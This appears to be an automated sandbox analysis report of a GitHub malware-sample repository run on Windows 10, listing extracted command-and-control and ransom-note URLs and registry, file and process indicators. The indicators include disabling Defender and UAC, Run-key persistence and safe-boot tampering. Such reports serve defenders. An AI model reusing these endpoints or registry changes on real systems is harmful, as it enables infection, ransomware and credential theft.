Analysis
-
max time kernel
587s -
max time network
588s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250217-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250217-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
12/03/2025, 02:46
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://github.com/Da2dalus/The-MALWARE-Repo
Resource
win10ltsc2021-20250217-en
General
-
Target
https://github.com/Da2dalus/The-MALWARE-Repo
Malware Config
Extracted
azorult
http://boglogov.site/index.php
Extracted
lokibot
http://blesblochem.com/two/gates1/fre.php
http://kbfvzoboss.bid/alien/fre.php
http://alphastand.trade/alien/fre.php
http://alphastand.win/alien/fre.php
http://alphastand.top/alien/fre.php
Extracted
C:\g6QpgrhJDdQZeF0\OSZYS-MANUAL.txt
gandcrab
http://gandcrabmfe6mnef.onion/ab69b2e7bf300b0a
Extracted
C:\Program Files\Common Files\DESIGNER\DECRYPT_YOUR_FILES.HTML
Extracted
C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___HMRRA_.txt
cerber
http://xpcx6erilkjced3j.onion/99AD-BF7C-75DD-0098-BF80
http://xpcx6erilkjced3j.1n5mod.top/99AD-BF7C-75DD-0098-BF80
http://xpcx6erilkjced3j.19kdeh.top/99AD-BF7C-75DD-0098-BF80
http://xpcx6erilkjced3j.1mpsnr.top/99AD-BF7C-75DD-0098-BF80
http://xpcx6erilkjced3j.18ey8e.top/99AD-BF7C-75DD-0098-BF80
http://xpcx6erilkjced3j.17gcun.top/99AD-BF7C-75DD-0098-BF80
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Cerber
Cerber is a widely used ransomware-as-a-service (RaaS), first seen in 2017.
-
Cerber family
-
CryptoLocker
Ransomware family with multiple variants.
-
Cryptolocker family
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
Fantom
Ransomware which hides encryption process behind fake Windows Update screen.
-
Fantom family
-
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
InfinityLock Ransomware
Also known as InfinityCrypt. Based on the open-source HiddenTear ransomware.
-
Infinitylock family
-
Lokibot family
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\Ransomware\\Birele.exe" Birele.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1" Azorult.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" Azorult.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" taskhostw.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1396 3512 icacls.exe 352 -
Rms family
-
Troldesh family
-
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
-
UAC bypass 3 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Azorult.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" regedit.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" regedit.exe -
Windows security bypass 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths regedit.exe -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 4 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
pid Process 3652 net1.exe 1316 net1.exe 1616 net.exe 376 net.exe -
Renames multiple (381) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (634) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (707) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 104 2684 RDPWInst.exe 106 2684 RDPWInst.exe 108 2684 RDPWInst.exe -
Blocks application from running via registry modification 13 IoCs
Adds application to list of disallowed applications.
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "essf_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "ESETOnlineScanner_UKR.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "HitmanPro.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "360TS_Setup_Mini.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "Cezurity_Scanner_Pro_Free.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "Cube.exe" Azorult.exe Set value (int) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun = "1" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\1 = "eav_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "avast_free_antivirus_setup_online.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\3 = "eis_trial_rus.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\5 = "hitmanpro_x64.exe" Azorult.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\7 = "ESETOnlineScanner_RUS.exe" Azorult.exe -
Contacts a large (1140) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Disables RegEdit via registry modification 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Krotten.exe Set value (int) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" Krotten.exe -
Disables Task Manager via registry modification
-
Drops file in Drivers directory 23 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\drivers\UMDF\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\drivers\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\drivers\ja-JP\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\drivers\en-US\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\drivers\es-ES\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\drivers\uk-UA\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\drivers\de-DE\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\System32\drivers\etc\hosts cmd.exe File created C:\Windows\SysWOW64\drivers\gmreadme.txt Fantom.exe File created C:\Windows\SysWOW64\drivers\en-US\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\drivers\fr-FR\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\drivers\it-IT\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\drivers\UMDF\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\drivers\fr-FR\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Azorult.exe File created C:\Windows\SysWOW64\drivers\es-ES\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\drivers\uk-UA\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\drivers\it-IT\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\drivers\UMDF\en-US\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\drivers\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\drivers\de-DE\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Windows\SysWOW64\drivers\UMDF\en-US\DECRYPT_YOUR_FILES.HTML Fantom.exe File opened for modification C:\Windows\SysWOW64\drivers\ja-JP\DECRYPT_YOUR_FILES.HTML Fantom.exe -
Modifies Windows Firewall 2 TTPs 26 IoCs
pid Process 4440 netsh.exe 5612 netsh.exe 1020 netsh.exe 4736 netsh.exe 4796 netsh.exe 3944 netsh.exe 4404 netsh.exe 2488 netsh.exe 2208 netsh.exe 4080 netsh.exe 2716 netsh.exe 3348 netsh.exe 2572 netsh.exe 60 netsh.exe 4876 netsh.exe 2080 netsh.exe 4460 netsh.exe 4736 netsh.exe 1452 netsh.exe 2752 netsh.exe 5980 netsh.exe 3332 netsh.exe 3432 netsh.exe 1860 netsh.exe 1672 netsh.exe 1156 netsh.exe -
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll" RDPWInst.exe -
Sets file to hidden 1 TTPs 4 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 5144 attrib.exe 420 attrib.exe 444 attrib.exe 60 attrib.exe -
Sets service image path in registry 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\Ransomware\\ac\\mssql.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\rmsmwtidnrxzvlls\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\Ransomware\\ac\\rmsmwtidnrxzvlls.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\pkilqwypmhgkdm\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\Ransomware\\ac\\pkilqwypmhgkdm.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ifliytuyyxzrhpb\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\Ransomware\\ac\\ifliytuyyxzrhpb.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ndthsokkxwpdxihts\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\Ransomware\\ac\\ndthsokkxwpdxihts.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zxatnxwwonamkl\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\Ransomware\\ac\\zxatnxwwonamkl.sys" mssql.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\Ransomware\\ac\\mssqlaq.sys" mssql.exe -
Stops running service(s) 4 TTPs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral1/files/0x0007000000028099-936.dat acprotect behavioral1/files/0x0007000000028098-935.dat acprotect -
resource yara_rule behavioral1/files/0x0007000000028096-892.dat aspack_v212_v242 behavioral1/files/0x0007000000028095-938.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 16 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation CoronaVirus.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation cheat.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation R8.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation Azorult.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation winlog.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation Dharma.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation GandCrab.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation wini.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation taskhost.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation Fantom.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation Cerber5.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Control Panel\International\Geo\Nation winlogon.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Drops startup file 15 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe RegSvcs.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E InfinityCrypt.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\DECRYPT_YOUR_FILES.HTML Fantom.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\OSZYS-MANUAL.txt GandCrab.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\bf300ce6bf300b0f44.lock GandCrab.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CoronaVirus.exe CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\OSZYS-MANUAL.txt CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\OSZYS-MANUAL.txt.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\OSZYS-MANUAL.txt.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe.5EDB9E0F4B04409078933F6388ECB760531692A90CBD5EA231FB843E7E5B5C8E.id-BF300B0A.[[email protected]].ncov CoronaVirus.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT_YOUR_FILES.HTML Fantom.exe -
Executes dropped EXE 51 IoCs
pid Process 236 Azorult.exe 4012 wini.exe 1152 winit.exe 3896 rutserv.exe 988 Lokibot.exe 4408 rutserv.exe 3180 rutserv.exe 4112 cheat.exe 1988 rutserv.exe 4716 rfusclient.exe 1676 rfusclient.exe 1372 ink.exe 1260 taskhost.exe 2896 P.exe 4408 rfusclient.exe 1672 R8.exe 4112 winlog.exe 3892 winlogon.exe 1396 Rar.exe 2684 RDPWInst.exe 3892 taskhostw.exe 1996 winlogon.exe 4356 RDPWInst.exe 3664 AgentTesla.exe 1596 butterflyondesktop.exe 3060 butterflyondesktop.tmp 3616 Lokibot.exe 696 taskhostw.exe 568 RevengeRAT.exe 3900 taskhostw.exe 2440 NoMoreRansom.exe 2984 Krotten.exe 4324 svchost.exe 4880 InfinityCrypt.exe 1924 GandCrab.exe 4656 Fantom.exe 1892 Dharma.exe 6028 nc123.exe 5184 mssql.exe 5272 mssql2.exe 5488 SearchHost.exe 5576 CryptoLocker.exe 1496 {34184A33-0407-212E-3320-09040709E2C2}.exe 4408 {34184A33-0407-212E-3320-09040709E2C2}.exe 4528 CoronaVirus.exe 6104 Cerber5.exe 6044 Birele.exe 14032 taskhostw.exe 15548 WindowsUpdate.exe 19448 taskhostw.exe 3836 taskhostw.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 17 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\WinDefend Birele.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager Birele.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc Birele.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power Birele.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc Birele.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\RMSMWTIDNRXZVLLS.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ifliytuyyxzrhpb.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\NDTHSOKKXWPDXIHTS.SYS mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\ZXATNXWWONAMKL.SYS mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys Birele.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\rmsmwtidnrxzvlls.sys mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\zxatnxwwonamkl.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys Birele.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\pkilqwypmhgkdm.sys mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\PKILQWYPMHGKDM.SYS mssql.exe Key deleted \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\SAFEBOOT\MINIMAL\IFLIYTUYYXZRHPB.SYS mssql.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ndthsokkxwpdxihts.sys mssql.exe -
Loads dropped DLL 1 IoCs
pid Process 920 svchost.exe -
Modifies file permissions 1 TTPs 62 IoCs
pid Process 2976 icacls.exe 3404 icacls.exe 1396 icacls.exe 2712 icacls.exe 2092 icacls.exe 2576 icacls.exe 2108 icacls.exe 3432 icacls.exe 5112 icacls.exe 1492 icacls.exe 3748 icacls.exe 1732 icacls.exe 2440 icacls.exe 2576 icacls.exe 4836 icacls.exe 1316 icacls.exe 424 icacls.exe 4208 icacls.exe 5056 icacls.exe 420 icacls.exe 328 icacls.exe 2956 icacls.exe 3432 icacls.exe 424 icacls.exe 1156 icacls.exe 1076 icacls.exe 1492 icacls.exe 4836 icacls.exe 4776 icacls.exe 3748 icacls.exe 2004 icacls.exe 1708 icacls.exe 4404 icacls.exe 1816 icacls.exe 2072 icacls.exe 3364 icacls.exe 4828 icacls.exe 3752 icacls.exe 1180 icacls.exe 4876 icacls.exe 4264 icacls.exe 2964 icacls.exe 4876 icacls.exe 2772 icacls.exe 64 icacls.exe 2616 icacls.exe 1860 icacls.exe 5060 icacls.exe 3000 icacls.exe 4492 icacls.exe 1084 icacls.exe 3684 icacls.exe 2232 icacls.exe 3416 icacls.exe 3212 icacls.exe 5056 icacls.exe 2440 icacls.exe 3728 icacls.exe 1860 icacls.exe 4492 icacls.exe 4412 icacls.exe 2240 icacls.exe -
Obfuscated with Agile.Net obfuscator 1 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource yara_rule behavioral1/memory/988-912-0x0000000002790000-0x00000000027A4000-memory.dmp agile_net -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution 1 TTPs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Lokibot.exe Key opened \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook Lokibot.exe Key opened \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook Lokibot.exe -
Adds Run key to start application 2 TTPs 10 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe" taskhostw.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AVPCC = "C:\\WINDOWS\\Cursors\\avp.exe" Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\system = "C:\\Users\\Admin\\Downloads\\The-MALWARE-Repo-master\\Ransomware\\Birele.exe" Birele.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CoronaVirus.exe = "C:\\Windows\\System32\\CoronaVirus.exe" CoronaVirus.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Windows\System32\Info.hta = "mshta.exe \"C:\\Windows\\System32\\Info.hta\"" CoronaVirus.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\C:\Users\Admin\AppData\Roaming\Info.hta = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\Info.hta\"" CoronaVirus.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem = "\"C:\\ProgramData\\Windows\\csrss.exe\"" NoMoreRansom.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\WINDOWS\\Web\\rundll32.exe" Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CryptoLocker = "C:\\Users\\Admin\\AppData\\Roaming\\{34184A33-0407-212E-3320-09040709E2C2}.exe" {34184A33-0407-212E-3320-09040709E2C2}.exe Set value (str) \REGISTRY\USER\S-1-5-21-1639757381-2759246526-4253643256-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe" RegSvcs.exe -
Checks whether UAC is enabled 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Azorult.exe -
pid Process 220 powershell.exe -
Drops desktop.ini file(s) 64 IoCs
description ioc Process File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\Videos\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Desktop\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini CoronaVirus.exe File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Downloads\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Music\desktop.ini CoronaVirus.exe File opened for modification C:\Users\Public\Pictures\desktop.ini CoronaVirus.exe File opened 